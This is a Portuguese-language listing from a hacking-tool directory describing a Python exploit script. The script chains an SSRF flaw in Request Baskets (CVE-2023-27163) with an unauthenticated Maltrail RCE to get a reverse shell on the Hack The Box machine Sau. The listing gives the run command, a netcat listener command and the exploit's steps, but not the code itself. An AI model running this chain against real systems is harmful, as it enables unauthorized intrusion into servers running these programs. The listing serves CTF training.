Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
htb-sau-exploit-chain — Cadeia de exploração automatizada para HTB Sau — CVE-2023-27163 (SSRF) + RCE não autenticado do Maltrail → Reverse Shell | Kitploit
Ferramentas/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
Geração de PayloadsExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

Cadeia de exploração automatizada para HTB Sau — CVE-2023-27163 (SSRF) + RCE não autenticado do Maltrail → Reverse Shell

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 4 mesesAinda não revisado

Cadeia de Exploração HTB Sau — CVE-2023-27163 (SSRF) + Automação de RCE no Maltrail

Um script de exploit em Python que combina a CVE-2023-27163 (Server-Side Request Forgery no Request Baskets ≤ 1.2.1) com uma vulnerabilidade de Remote Code Execution não autenticada no Maltrail 0.53, entregando um reverse shell. Projetado para a máquina Sau do Hack The Box.


📌 Visão Geral

Este script automatiza o caminho de exploração necessário para obter acesso inicial ao alvo:

  1. Explorando a CVE-2023-27163 para obter um endpoint de bucket utilizável
  2. Aproveitando o serviço exposto para interagir com o Maltrail
  3. Acionando um RCE não autenticado no Maltrail
  4. Entregando um reverse shell para a máquina do atacante

⚙️ Uso

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Exemplo:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Listener Netcat (Importante)

Antes de executar o exploit, inicie um listener na sua máquina para capturar o reverse shell:

root@kitploit:~
nc -lvnp <LISTENER_PORT>

Exemplo:

root@kitploit:~
nc -lvnp 4444

🧩 Parâmetros

ParâmetroDescrição
TARGET_URLURL base do alvo (ex.: http://IP)
LISTENER_IPIP da sua máquina atacante
LISTENER_PORTPorta para receber o reverse shell

🚀 Fluxo do Exploit

  • Normalizar a URL do alvo
  • Acionar a CVE-2023-27163 para criar/acessar um request basket
  • Extrair o endpoint acessível (bucket_url)
  • Usar o bucket para interagir com o Maltrail
  • Executar o payload para gerar o reverse shell

⚠️ Notas

  • Certifique-se de que o seu listener está em execução antes de executar o script
  • Remova a / final da URL do alvo (tratado automaticamente no script)
  • Projetado especificamente para a máquina HTB Sau — pode não generalizar

📚 Referências

  • CVE-2023-27163 (Request Baskets)
  • Maltrail Unauthenticated RCE

🛑 Aviso Legal

Este projeto destina-se a fins educacionais e ao uso em ambientes autorizados, como o Hack The Box. Não use contra sistemas sem a devida permissão.

Baixar ferramenta